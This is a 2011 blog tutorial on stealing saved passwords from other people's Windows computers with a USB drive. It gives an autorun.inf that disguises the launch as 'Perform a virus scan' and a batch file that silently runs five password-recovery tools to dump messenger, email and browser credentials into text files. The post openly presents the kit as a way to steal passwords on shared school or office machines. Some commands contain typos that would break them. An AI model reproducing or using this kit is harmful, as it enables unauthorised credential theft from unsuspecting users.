Find out what I'm doing, Follow Me :)

Wednesday, May 4, 2011


Here, I come with a new cool way to hack passwords physically, it means that physical approach matters a lot for using this method. We will use a usb and some applications to hack stored passwords in any computer. As we know now a days people sign up at large number of websites and to remember them all they store their passwords in the computer. We will try recovering them automatically using a USB drive. Yes, All we need is to plug the USB in any port. This trick will work for Windows 7, Windows XP, windows 2000, and Windows Vista also. All the applications included are light enough and very portable that these can be pasted and downloaded in the USB disk in few seconds. You can also hack stored messenger passwords. It will help you if you are using a school combined computer or an official may be. Lets start the tutorial:
Application which you need:

Messen Pass- Messen Pass is a password recovery tool that reveals the passwords of the many instant messenger applications as I have already created post over it.

Mail Passview- Mail Passview is a small password-recovery tool that teveals the passwords and other account details for the following email clients : Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsift Outlook 2002/2003/2007/2010 (POP3, IMAP, HTTP, and SMTP Account), Windows Mail, Windows Live Mail, IcrediMail, Eudora, Netscape 6.x/7.x (If the password is not encrypted with master password), Mozila Thunderbird (If the password is not encrypted with master password), Group Mail Free, Yahoo! Mail- If the password is saved in Yahoo! Messenger application, Hotmail/MSN mail- If the password is saved by gmail Notifier application, Google Desktop, or by Google talk.

IE Passview - As the name tells that it will be used to recover and hack all the passwords stored in the internet explorer. It supports all new and old version.

Protected Storage PassView- Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer. The passwords are reaveald by reading the information from the Protected Storage. Starting from version 1.60, this utility reveals all AutoComplete string stored in Internet Explorer, not only the AutoComplete password, as in the previous versions.

Password Fox: PasswordFoxf is a small password recovery too that allows you to view the user names and passwords stored by Mozilla Firefox Web Browser. By default, select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

So, I think you will wonder that what else is left to be attacked, Yes, Its a complete attack. What is requires is physical access. After downloading all the files extract them.

STEP 1) After extracting all the five tools, copy only *.exe files in the USB drive. i-e copy the files mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe

STEP 2) Create a new notepad document and write following lines it it:
ACTION= Perform a virus scan
After that save it as autorun.inf and now copy this files to USB drive.

STEP 3) After that again open notepad and write this in it:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe / stext iepv.txt
start pspv.exe / stext pspv.txt
start passwordfox.exe / stext passwordfox.txt
save it as launch.bat and copy this into your USB drive.

How to use this?

Now your toolkit is ready and you are all set to steal the passwords. You can use this pendrive on any computer to steal the stored passwords. Just follows these Steps:

1) Insert the pendrive and the autorun windows will pop-up. (This is because, we have created and autorun pendrive).

2) In the pop-up windows, select the first option (perform a virus Scan).

3) Now all the password recovery tools will silently get executed in the background (This0 process takes hardly a few seconds). The passwords get stored in the >txt files.

4) Remove the pendrive and you will see the stored passwords in the .txt files.

No comments:

Post a Comment